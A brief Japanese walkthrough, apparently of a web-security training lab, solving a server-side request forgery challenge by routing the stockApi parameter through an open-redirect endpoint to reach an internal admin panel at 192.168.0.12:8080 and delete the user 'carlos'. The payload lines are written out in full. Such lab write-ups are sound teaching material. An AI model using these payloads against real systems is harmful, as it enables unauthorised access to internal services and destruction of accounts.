Hello there, ('ω')ノ
オープンリダイレクトの脆弱性によるフィルタバイパスを備えたSSRFを。
まずは、Check stackしてからNext productして。
Check stockのリクエストをリピータへ。
下記に変更して実行してみるとエラーが。
stockApi=http://192.168.0.12:8080
次にNext productのリクエストをリピータへ。
Next productのリクエストをCheck stockのリクエストのstockApiで実行すると。
エラーステータスが変わって。
stockApi=/product/nextProduct?path=http://192.168.0.12:8080
adminを追加して実行すると管理者画面が。
stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin
もとのページにもどって、再度Check stockを実行して。
さきほどのペイロードにstockApiを変更して管理者ページを。
carlosのDeleteパラメータを確認して。
下記のように再度、ペイロードを実行すると。
stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
クリアできた。
Best regards, (^^ゞ